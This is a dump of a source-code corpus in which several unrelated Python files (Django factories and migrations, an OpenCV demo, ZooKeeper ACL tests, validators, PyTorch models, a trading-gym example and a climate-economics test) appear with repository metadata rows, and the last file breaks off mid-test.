class PageFactory(factory.DjangoModelFactory):
class Meta(object):
model = Page
language = 'en'
title = factory.Sequence(lambda n: 'Page Title {0}'.format(n))
author = factory.SubFactory(BlueBottleUserFactory)
slug = factory.Sequence(lambda n: 'slug-{0}'.format(n))
status = Page.PageStatus.published
publication_date = now() - timedelta(days=4)
| 27.809524 | 66 | 0.741438 | 382 | 0.65411 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.05137 |
395bc11ce97e1bb26dff3ffa2dd8e88c133704f6 | 2,403 | py | Python | ietf/ipr/migrations/0007_create_ipr_doc_events.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 25 | 2022-03-05T08:26:52.000Z | 2022-03-30T15:45:42.000Z | ietf/ipr/migrations/0007_create_ipr_doc_events.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 219 | 2022-03-04T17:29:12.000Z | 2022-03-31T21:16:14.000Z | ietf/ipr/migrations/0007_create_ipr_doc_events.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 22 | 2022-03-04T15:34:34.000Z | 2022-03-28T13:30:59.000Z | # Copyright The IETF Trust 2020, All Rights Reserved
# -*- coding: utf-8 -*-
# Generated by Django 1.11.27 on 2020-01-17 12:32
from django.db import migrations
def create_or_delete_ipr_doc_events(apps, delete=False):
"""Create or delete DocEvents for IprEvents
Mostly duplicates IprEvent.create_doc_events(). This is necessary
because model methods, including custom save() methods, are not
available to migrations.
"""
IprEvent = apps.get_model('ipr', 'IprEvent')
DocEvent = apps.get_model('doc', 'DocEvent')
# Map from self.type_id to DocEvent.EVENT_TYPES for types that
# should be logged as DocEvents
event_type_map = {
'posted': 'posted_related_ipr',
'removed': 'removed_related_ipr',
}
for ipr_event in IprEvent.objects.filter(type_id__in=event_type_map):
related_docs = set() # related docs, no duplicates
for alias in ipr_event.disclosure.docs.all():
related_docs.update(alias.docs.all())
for doc in related_docs:
kwargs = dict(
type=event_type_map[ipr_event.type_id],
time=ipr_event.time,
by=ipr_event.by,
doc=doc,
rev='',
desc='%s related IPR disclosure: <b>%s</b>' % (ipr_event.type.name,
ipr_event.disclosure.title),
)
events = DocEvent.objects.filter(**kwargs) # get existing events
if delete:
events.delete()
elif len(events) == 0:
DocEvent.objects.create(**kwargs) # create if did not exist
def forward(apps, schema_editor):
"""Create a DocEvent for each 'posted' or 'removed' IprEvent"""
create_or_delete_ipr_doc_events(apps, delete=False)
def reverse(apps, schema_editor):
"""Delete DocEvents that would be created by the forward migration
This removes data, but only data that can be regenerated by running
the forward migration.
"""
create_or_delete_ipr_doc_events(apps, delete=True)
class Migration(migrations.Migration):
dependencies = [
('ipr', '0006_document_primary_key_cleanup'),
# Ensure the DocEvent types we need exist
('doc', '0029_add_ipr_event_types'),
]
operations = [
migrations.RunPython(forward, reverse),
]
| 34.826087 | 91 | 0.62422 | 289 | 0.120266 | 0 | 0 | 0 | 0 | 0 | 0 | 997 | 0.414898 |
395f29ec9cf26aad90082c0bbf20534ee8f84d4b | 788 | py | Python | getting_setting.py | madhurgupta96/Image-Fundamentals-with-OpenCV | 890fcce30155e98ab66e206c3511d77040570ec5 | [
"Apache-2.0"
] | null | null | null | getting_setting.py | madhurgupta96/Image-Fundamentals-with-OpenCV | 890fcce30155e98ab66e206c3511d77040570ec5 | [
"Apache-2.0"
] | null | null | null | getting_setting.py | madhurgupta96/Image-Fundamentals-with-OpenCV | 890fcce30155e98ab66e206c3511d77040570ec5 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 15 23:52:04 2020
@author: Madhur Gupta
"""
from __future__ import print_function
import cv2
import argparse
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image',required=True,help='path to image')
args=vars(ap.parse_args())
image=cv2.imread(args['image'])
cv2.imshow("Original", image)
#setting 0,0 as red pixel
(b,g,r)=image[0,0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
image[0, 0] = (0, 0, 255)
(b, g, r) = image[0, 0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
#setting the corner of image as green
corner=image[0:100,0:100]
cv2.imshow('corner',corner)
image[0:100,0:100]=(0,255,0)
cv2.imshow('Updated',image)
cv2.waitKey(0)
| 22.514286 | 71 | 0.619289 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 316 | 0.401015 |
395f4cf60fb9e63158d7823964bdae4a063e3899 | 665 | py | Python | zk_shell/tests/test_acl_reader.py | sellers/zk_shell | 5f5972c4362212f97de91a75e44d2a551c7bcd51 | [
"Apache-2.0"
] | 163 | 2015-01-24T06:17:34.000Z | 2021-12-17T22:58:46.000Z | zk_shell/tests/test_acl_reader.py | sellers/zk_shell | 5f5972c4362212f97de91a75e44d2a551c7bcd51 | [
"Apache-2.0"
] | 86 | 2015-01-01T00:22:57.000Z | 2022-03-02T14:50:59.000Z | zk_shell/tests/test_acl_reader.py | sellers/zk_shell | 5f5972c4362212f97de91a75e44d2a551c7bcd51 | [
"Apache-2.0"
] | 32 | 2015-02-18T17:33:16.000Z | 2021-12-28T03:43:45.000Z | # -*- coding: utf-8 -*-
""" ACLReader test cases """
import unittest
from kazoo.security import ACL, Id
from zk_shell.acl import ACLReader
class ACLReaderTestCase(unittest.TestCase):
""" test watcher """
def test_extract_acl(self):
acl = ACLReader.extract_acl('world:anyone:cdrwa')
expected = ACL(perms=31, id=Id(scheme='world', id='anyone'))
self.assertEqual(expected, acl)
def test_username_password(self):
acl = ACLReader.extract_acl('username_password:user:secret:cdrwa')
expected = ACL(perms=31, id=Id(scheme='digest', id=u'user:5w9W4eL3797Y4Wq8AcKUPPk8ha4='))
self.assertEqual(expected, acl)
| 28.913043 | 97 | 0.685714 | 519 | 0.780451 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.281203 |
395f821293e57d64e71d8ac788f63dcdb5e4e300 | 3,815 | py | Python | dictator/validators/base.py | brunosmmm/dictator | 60314734b9d0c378fad77d296c8946165f372400 | [
"MIT"
] | null | null | null | dictator/validators/base.py | brunosmmm/dictator | 60314734b9d0c378fad77d296c8946165f372400 | [
"MIT"
] | null | null | null | dictator/validators/base.py | brunosmmm/dictator | 60314734b9d0c378fad77d296c8946165f372400 | [
"MIT"
] | null | null | null | """Base validators."""
import re
from dictator.errors import ValidationError
from dictator.validators import Validator
from typing import Type, Callable, Any, Tuple, Union
HEX_REGEX = re.compile(r"^(0x)?([0-9A-Fa-f]+)$")
BIN_REGEX = re.compile(r"^(0b)?([0-1]+)$")
class ValidateType(Validator):
"""Type validator.
Validates if an object is from a certain Python type.
"""
_DEFAULT_NAME = "type"
def __init__(self, *_types: Type):
"""Initialize.
Parameters
----------
type
The expected python type
"""
super().__init__()
self._types = _types
@property
def target_types(self) -> Tuple[Type, ...]:
"""Get target type."""
return self._types
def validate(self, _value, **kwargs):
"""Perform validation."""
if not isinstance(_value, self.target_types):
raise ValidationError(f"value has unexpected type")
return _value
class ValidatorFactory(Validator):
"""Validator factory.
Create a validator class from a validation function.
"""
def __init__(self, validate_fn: Union[Callable, Validator], **kwargs):
"""Initialize.
Parameters
----------
validate_fn
Some callable that performs actual validation
"""
super().__init__(**kwargs)
if not callable(validate_fn):
raise TypeError("validate_fn must be callable")
if isinstance(validate_fn, Validator):
self._validatefn = validate_fn.validate
else:
self._validatefn = validate_fn
def validate(self, _value, **kwargs):
"""Perform validation."""
return self._validatefn(_value, **kwargs)
def _validate_integer(_value: Any, **kwargs: Any) -> int:
"""Validate integer value.
Parameters
----------
_value
Some value
kwargs
Other metadata
"""
if isinstance(_value, str):
# try converting
h = HEX_REGEX.match(_value)
b = BIN_REGEX.match(_value)
if h is not None:
if h.group(1) is None and b is not None:
# is actually binary
return int(h.group(2), 2)
return int(h.group(2), 16)
raise ValidationError("cannot validate as integer")
elif isinstance(_value, bool):
raise ValidationError("cannot validate as integer, got boolean")
elif isinstance(_value, int):
return _value
raise ValidationError("cannot validate as integer")
validate_string = ValidatorFactory(ValidateType(str))
validate_list = ValidatorFactory(ValidateType(tuple, list))
validate_dict = ValidatorFactory(ValidateType(dict))
validate_boolean = ValidatorFactory(ValidateType(bool))
validate_float = ValidatorFactory(ValidateType(float))
validate_integer = ValidatorFactory(_validate_integer)
validate_string_pre = ValidatorFactory(ValidateType(str), after_fn=False)
validate_list_pre = ValidatorFactory(ValidateType(tuple, list), after_fn=False)
validate_dict_pre = ValidatorFactory(ValidateType(dict), after_fn=False)
validate_boolean_pre = ValidatorFactory(ValidateType(bool), after_fn=False)
validate_float_pre = ValidatorFactory(ValidateType(float), after_fn=False)
validate_integer_pre = ValidatorFactory(_validate_integer, after_fn=False)
def validate_null(_value: Any, **kwargs: Any) -> None:
"""Validate null value.
Parameters
---------
_value
Some value
kwargs
Other metadata
"""
if _value is not None:
raise ValidationError("value is not null")
return _value
DEFAULT_VALIDATOR_BY_TYPE = {
int: validate_integer,
str: validate_string,
list: validate_list,
dict: validate_dict,
bool: validate_boolean,
float: validate_float,
}
| 27.644928 | 79 | 0.654522 | 1,477 | 0.387156 | 0 | 0 | 115 | 0.030144 | 0 | 0 | 1,036 | 0.27156 |
3960d947244ab5cacdb399b505a02597c36f0c4b | 554 | py | Python | copasi_test/ReportParserMoieties.py | copasi/python-copasi-testsuite | 604ce52f95b4a0e2631712b22c331cd8c263bd05 | [
"Artistic-2.0"
] | null | null | null | copasi_test/ReportParserMoieties.py | copasi/python-copasi-testsuite | 604ce52f95b4a0e2631712b22c331cd8c263bd05 | [
"Artistic-2.0"
] | null | null | null | copasi_test/ReportParserMoieties.py | copasi/python-copasi-testsuite | 604ce52f95b4a0e2631712b22c331cd8c263bd05 | [
"Artistic-2.0"
] | null | null | null | from .ReportParser import ReportParser
class ReportParserMoieties(ReportParser):
def __init__(self):
ReportParser.__init__(self)
def parseLines(self, lines):
# type: ([str]) -> None
current = self.skip_until(lines, 0, 'Link matrix(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
current = self.skip_until(lines, current, 'Stoichiometry(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
| 29.157895 | 71 | 0.628159 | 512 | 0.924188 | 0 | 0 | 0 | 0 | 0 | 0 | 61 | 0.110108 |
396297e39e5a9bcc3e2b8459e2edf7a1785fe3e7 | 1,575 | py | Python | models/networks/recurrent/encoder.py | jamesoneill12/LayerFusion | 99cba1030ed8c012a453bc7715830fc99fb980dc | [
"Apache-2.0"
] | null | null | null | models/networks/recurrent/encoder.py | jamesoneill12/LayerFusion | 99cba1030ed8c012a453bc7715830fc99fb980dc | [
"Apache-2.0"
] | null | null | null | models/networks/recurrent/encoder.py | jamesoneill12/LayerFusion | 99cba1030ed8c012a453bc7715830fc99fb980dc | [
"Apache-2.0"
] | null | null | null | import torch.nn as nn
import torch
class EncoderRNN(nn.Module):
def __init__(self, vocab_size, hidden_size, nlayers=2):
super(EncoderRNN, self).__init__()
self.nlayers = nlayers
self.hidden_size = hidden_size
self.embedding = nn.Embedding(vocab_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, num_layers=nlayers)
def forward(self, input, hidden):
input = self.embedding(input)
output, hidden = self.gru(input, hidden)
return output, hidden
def initHidden(self, bsz):
#weight = next(self.parameters())
#return weight.new_zeros(self.nlayers, bsz, self.hidden_size)
#return Variable(torch.randn(self.nlayers, bsz, self.hidden_size, device='cuda'), requires_grad=True)
return torch.zeros(self.nlayers, bsz, self.hidden_size, device='cuda')
"""
# use this one when not doing multi-task learning as a baseline
class EncoderRNN(nn.Module):
def __init__(self, input_size, hidden_size, nlayers=2):
super(EncoderRNN, self).__init__()
self.nlayers = nlayers
self.hidden_size = hidden_size
self.embedding = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, nlayers)
def forward(self, input, hidden):
embedded = self.embedding(input).view(1, 1, -1)
output = embedded
output, hidden = self.gru(output, hidden)
return output, hidden
def initHidden(self, bsz):
return torch.zeros(self.nlayers, bsz, self.hidden_size, device='gpu')
"""
| 35 | 109 | 0.670476 | 826 | 0.524444 | 0 | 0 | 0 | 0 | 0 | 0 | 909 | 0.577143 |
396309f795615e199934ec29198bf8e06add077e | 1,087 | py | Python | relationship_classifiction/test.py | suolyer/PyTorch_BERT_Pipeline_IE | 869a1fc937e268a565f5b30a2105a460b4e07f59 | [
"MIT"
] | 8 | 2021-05-23T02:04:09.000Z | 2022-01-14T08:58:42.000Z | relationship_classifiction/test.py | 2019hong/PyTorch_BERT_Pipeline_IE | 9ee66bc9ceaed42e996e9b2414612de3fc0b23bb | [
"MIT"
] | 2 | 2021-05-14T00:34:45.000Z | 2021-08-08T08:36:33.000Z | relationship_classifiction/test.py | 2019hong/PyTorch_BERT_Pipeline_IE | 9ee66bc9ceaed42e996e9b2414612de3fc0b23bb | [
"MIT"
] | 1 | 2021-09-28T15:15:44.000Z | 2021-09-28T15:15:44.000Z |
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import CosineAnnealingLR, CosineAnnealingWarmRestarts
import itertools
import matplotlib.pyplot as plt
initial_lr = 0.1
class model(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3)
def forward(self, x):
pass
net_1 = model()
optimizer_1 = torch.optim.Adam(net_1.parameters(), lr=initial_lr)
scheduler_1 = CosineAnnealingWarmRestarts(optimizer_1, T_0=1)
print("初始化的学习率:", optimizer_1.defaults['lr'])
lr_list = [] # 把使用过的lr都保存下来,之后画出它的变化
for epoch in range(0, 6):
# train
for i in range(int(30000/32)):
optimizer_1.zero_grad()
optimizer_1.step()
print("第%d个epoch的学习率:%f" % (epoch, optimizer_1.param_groups[0]['lr']))
lr_list.append(optimizer_1.param_groups[0]['lr'])
scheduler_1.step((epoch+i+1)/int(30000/32))
# 画出lr的变化
plt.plot(lr_list)
plt.xlabel("epoch")
plt.ylabel("lr")
plt.title("learning rate's curve changes as epoch goes on!")
plt.show()
| 24.155556 | 83 | 0.689052 | 192 | 0.164807 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.186266 |
39637ce1898c8dbfd20a89d25579fc15ae6c2bcd | 432 | py | Python | events_calendar/urls.py | mkbeh/Site-Nordic-Walking- | ba98f41db09ed448ecc4db175f65ef4fa2d64979 | [
"MIT"
] | null | null | null | events_calendar/urls.py | mkbeh/Site-Nordic-Walking- | ba98f41db09ed448ecc4db175f65ef4fa2d64979 | [
"MIT"
] | 8 | 2021-04-08T21:57:55.000Z | 2022-03-12T00:50:38.000Z | events_calendar/urls.py | mkbeh/Site-Nordic-Walking- | ba98f41db09ed448ecc4db175f65ef4fa2d64979 | [
"MIT"
] | null | null | null | from django.urls import path
from .views import events_calendar, calendar_event_detail, past_competitions
app_name = 'events_calendar'
urlpatterns = [
path('past_competitions/', past_competitions, name='past_competitions'),
path('<int:year>/<int:month>/<int:day>/<int:hour>/<slug:event>/',
calendar_event_detail, name='calendar_event_detail'),
path('<int:days>', events_calendar, name='events_calendar'),
]
| 30.857143 | 76 | 0.733796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.386574 |
39642b71284a9db7523df49c8dca22286f61d556 | 1,236 | py | Python | examples/linear_regression/01_linear_regression.py | zhaoshiying97/trading_gym | d4af8d724efa17420e6ebb430f6f9d4f08c6f83a | [
"Apache-2.0"
] | 32 | 2019-12-06T19:23:51.000Z | 2022-03-08T06:08:58.000Z | examples/linear_regression/01_linear_regression.py | zhaoshiying97/trading_gym | d4af8d724efa17420e6ebb430f6f9d4f08c6f83a | [
"Apache-2.0"
] | 2 | 2020-02-20T11:04:07.000Z | 2020-03-12T08:47:54.000Z | examples/linear_regression/01_linear_regression.py | zhaoshiying97/trading_gym | d4af8d724efa17420e6ebb430f6f9d4f08c6f83a | [
"Apache-2.0"
] | 15 | 2019-12-12T07:43:34.000Z | 2022-03-06T13:02:39.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pdb
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from trading_gym.utils.data.toy import create_toy_data
from trading_gym.envs.portfolio_gym.portfolio_gym import PortfolioTradingGym
order_book_id_number = 100
toy_data = create_toy_data(order_book_ids_number=order_book_id_number, feature_number=10, start="2019-05-01", end="2019-12-12", frequency="D")
env = PortfolioTradingGym(data_df=toy_data, sequence_window=1, add_cash=False)
state = env.reset()
while True:
next_state, reward, done, info = env.step(action=None)
label = info["one_step_fwd_returns"]
print(state)
print(label)
#
regressor = LinearRegression()
regressor.fit(state.values, label.values)
#display and store
print(regressor.coef_)
env.experience_buffer["coef"].append(regressor.coef_)
#
if done:
break
else:
state = next_state
#
factor_returns = pd.DataFrame(np.array(env.experience_buffer["coef"]), index=env.experience_buffer["dt"], columns=toy_data.columns[:-1])
cum_factor_returns = (factor_returns +1).cumprod()
cum_factor_returns.plot(title="Cumulative Factor Return",linewidth=2.2)
| 30.9 | 142 | 0.741909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 157 | 0.127023 |
3965e8f70ee4cbba8c4a1ffa659f82e9962bbdcf | 619 | py | Python | migrations/versions/6f98e24760d_session_speaker.py | jace/goafunnel | 5ff25f0e6a247ff1f6e87fce2a793d1775476cc0 | [
"BSD-2-Clause"
] | null | null | null | migrations/versions/6f98e24760d_session_speaker.py | jace/goafunnel | 5ff25f0e6a247ff1f6e87fce2a793d1775476cc0 | [
"BSD-2-Clause"
] | null | null | null | migrations/versions/6f98e24760d_session_speaker.py | jace/goafunnel | 5ff25f0e6a247ff1f6e87fce2a793d1775476cc0 | [
"BSD-2-Clause"
] | null | null | null | """session speaker
Revision ID: 6f98e24760d
Revises: 58588eba8cb8
Create Date: 2013-11-22 17:28:47.751025
"""
# revision identifiers, used by Alembic.
revision = '6f98e24760d'
down_revision = '58588eba8cb8'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('session', sa.Column('speaker', sa.Unicode(length=200), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('session', 'speaker')
### end Alembic commands ###
| 22.925926 | 89 | 0.6979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 388 | 0.626817 |
39671833a02d25c6d6b9a61a074e54f03e6112e8 | 1,124 | py | Python | decision_tree/dt_author_id.py | ncfausti/udacity-machine-learning | 223eb1821e739d048d278629a2e466b3f2af8912 | [
"MIT"
] | null | null | null | decision_tree/dt_author_id.py | ncfausti/udacity-machine-learning | 223eb1821e739d048d278629a2e466b3f2af8912 | [
"MIT"
] | null | null | null | decision_tree/dt_author_id.py | ncfausti/udacity-machine-learning | 223eb1821e739d048d278629a2e466b3f2af8912 | [
"MIT"
] | null | null | null | #!/usr/bin/python
"""
this is the code to accompany the Lesson 3 (decision tree) mini-project
use an DT to identify emails from the Enron corpus by their authors
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
from sklearn import tree
from sklearn.metrics import accuracy_score
import time
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
clf = tree.DecisionTreeClassifier(min_samples_split = 40)
clf = clf.fit(features_train, labels_train)
prediction = clf.predict(features_test)
accuracy = accuracy_score(prediction, labels_test)
print("Accuracy: %.6f" % accuracy)
print("Feature length: %d" % len(features_train[0]))
#########################################################
### your code goes here ###
#########################################################
def running_time():
pass | 24.434783 | 75 | 0.674377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 585 | 0.520463 |
3968419bade051f1706f219d6c57e614a8cbfb88 | 49,588 | py | Python | climateeconomics/tests/_l1_test_energy_global_values.py | os-climate/witness-core | 3ef9a44d86804c5ad57deec3c9916348cb3bfbb8 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2022-01-14T06:37:42.000Z | 2022-01-14T06:37:42.000Z | climateeconomics/tests/_l1_test_energy_global_values.py | os-climate/witness-core | 3ef9a44d86804c5ad57deec3c9916348cb3bfbb8 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | climateeconomics/tests/_l1_test_energy_global_values.py | os-climate/witness-core | 3ef9a44d86804c5ad57deec3c9916348cb3bfbb8 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | '''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
Copyright (C) 2020 Airbus SAS
'''
import unittest
import time
import numpy as np
import pandas as pd
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from climateeconomics.sos_processes.iam.witness.witness_dev.usecase_witness import Study as Study_open
class TestGlobalEnergyValues(unittest.TestCase):
"""
This test class has the objective to test order of magnitude of some key values in energy models in 2020
All the data are taken either from ourworldindata:
Hannah Ritchie, Max Roser and Pablo Rosado (2020) - "Energy". Published online at OurWorldInData.org.
Retrieved from: 'https://ourworldindata.org/energy' [Online Resource]
Or from IEA:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
"""
def setUp(self):
'''
Initialize third data needed for testing
'''
self.dirs_to_del = []
self.namespace = 'MyCase'
self.study_name = f'{self.namespace}'
self.name = 'Test'
self.energymixname = 'EnergyMix'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
builder = self.ee.factory.get_builder_from_process(
repo, 'witness_dev')
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
usecase = Study_open(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
self.ee.display_treeview_nodes()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
self.ee.load_study_from_input_dict(full_values_dict)
# def test_01_check_global_production_values(self):
# '''
# Test order of magnitude of raw energy production with values from ourworldindata
# https://ourworldindata.org/energy-mix?country=
#
# '''
# self.ee.execute()
#
# # These emissions are in Gt
# energy_production = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
#
# '''
# Theory in 2019 from ourwolrdindata expressed in TWh (2020 is a covid year)
# we need to substract energy own use to get same hypthesis than our models (enrgy own_use is substracted from raw production
# '''
# oil_product_production = 49472. - 2485.89
# wind_production = 1590.19 # in 2020
# nuclear_production = 2616.61
# hydropower_production = 4355.
# trad_biomass_production = 13222.
# other_renew_production = 1614.
# modern_biofuels_production = 1043. # in 2020
# # in 2020
# # https://ourworldindata.org/renewable-energy#solar-energy-generation
# solar_production = 844.37
# coal_production = 43752. - 952.78
# gas_production = 39893. - 3782.83
# total_production = 171240.
#
# '''
# Oil production
# '''
#
# computed_oil_production = energy_production['production fuel.liquid_fuel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_oil_production,
# oil_product_production * 1.1)
# self.assertGreaterEqual(
# computed_oil_production, oil_product_production * 0.9)
#
# '''
# Gas production
# '''
# fossil_gas_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.methane.FossilGas.techno_production')
# computed_gas_production = fossil_gas_prod['methane (TWh)'].loc[
# fossil_gas_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_gas_production,
# gas_production * 1.1)
# self.assertGreaterEqual(
# computed_gas_production, gas_production * 0.9)
#
# '''
# Coal production
# '''
# coal_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.CoalExtraction.techno_production')
# computed_coal_production = coal_prod['solid_fuel (TWh)'].loc[
# coal_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_coal_production,
# coal_production * 1.1)
# self.assertGreaterEqual(
# computed_coal_production, coal_production * 0.9)
#
# '''
# Biomass production , the value is traditional biomass consumption , but we know that we do not consume all the biomass that we can produce
# Waiting for a specific value to compare
# '''
# #
# computed_biomass_production = energy_production['production biomass_dry (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biomass_production,
# trad_biomass_production * 1.1)
# self.assertGreaterEqual(
# computed_biomass_production, trad_biomass_production * 0.9)
#
# '''
# Biofuel production
# '''
#
# computed_biodiesel_production = energy_production['production fuel.biodiesel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biogas_production = energy_production['production biogas (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biofuel_production = computed_biodiesel_production + \
# computed_biogas_production
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biofuel_production,
# modern_biofuels_production * 1.1)
# # we compare in TWh and must be near 30% of error because some biofuels
# # are missing
# self.assertGreaterEqual(
# computed_biofuel_production, modern_biofuels_production * 0.7)
#
# '''
# Solar production
# '''
# elec_solar_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
#
# elec_solarth_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
#
# computed_solar_production = elec_solar_prod['electricity (TWh)'].loc[
# elec_solar_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_solarth_prod['electricity (TWh)'].loc[
# elec_solarth_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_solar_production,
# solar_production * 1.1)
# self.assertGreaterEqual(
# computed_solar_production, solar_production * 0.9)
#
# '''
# Wind production
# '''
# elec_windonshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
# elec_windoffshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
#
# computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
# elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_windoffshore_prod['electricity (TWh)'].loc[
# elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_wind_production,
# wind_production * 1.1)
# self.assertGreaterEqual(
# computed_wind_production, wind_production * 0.9)
#
# '''
# Nuclear production
# '''
# elec_nuclear_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
#
# computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
# elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_nuclear_production,
# nuclear_production * 1.1)
# self.assertGreaterEqual(
# computed_nuclear_production, nuclear_production * 0.9)
#
# '''
# Hydropower production
# '''
# elec_hydropower_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
#
# computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
# elec_hydropower_prod['years'] == 2020].values[0] * 1000
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_hydropower_production,
# hydropower_production * 1.1)
# self.assertGreaterEqual(
# computed_hydropower_production, hydropower_production * 0.9)
def test_02_check_global_co2_emissions_values(self):
'''
Test order of magnitude of co2 emissions with values from ourworldindata
https://ourworldindata.org/emissions-by-fuel
'''
self.ee.execute()
# These emissions are in Gt
co2_emissions_by_energy = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.co2_emissions_by_energy')
'''
Theory in 2020 from ourwolrdindata expressed in Mt
'''
oil_co2_emissions = 11.07e3 # expressed in Mt
coal_co2_emissions = 13.97e3 # expressed in Mt
gas_co2_emissions = 7.4e3 # expressed in Mt
total_co2_emissions = 34.81e3 # billions tonnes
'''
Methane CO2 emissions are emissions from methane energy + gasturbine from electricity
'''
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_detailed_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_detailed_production')
wgs_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.WaterGasShift.techno_detailed_production')
computed_methane_co2_emissions = co2_emissions_by_energy['methane'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_gt_prod['CO2 from Flue Gas (Mt)'].loc[elec_gt_prod['years']
== 2020].values[0] +\
elec_cgt_prod['CO2 from Flue Gas (Mt)'].loc[elec_gt_prod['years']
== 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.75
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_methane_co2_emissions,
gas_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_methane_co2_emissions, gas_co2_emissions * 0.9)
print(
f'Methane CO2 emissions : ourworldindata {gas_co2_emissions} Mt vs WITNESS {computed_methane_co2_emissions} TWh')
'''
Coal CO2 emissions are emissions from coal energy + CoalGeneration from electricity + SMR +
'''
elec_coal_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_detailed_production')
computed_coal_co2_emissions = co2_emissions_by_energy['solid_fuel'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_coal_prod['CO2 from Flue Gas (Mt)'].loc[elec_coal_prod['years']
== 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.25
# we compare in Mt and must be near 10% of error
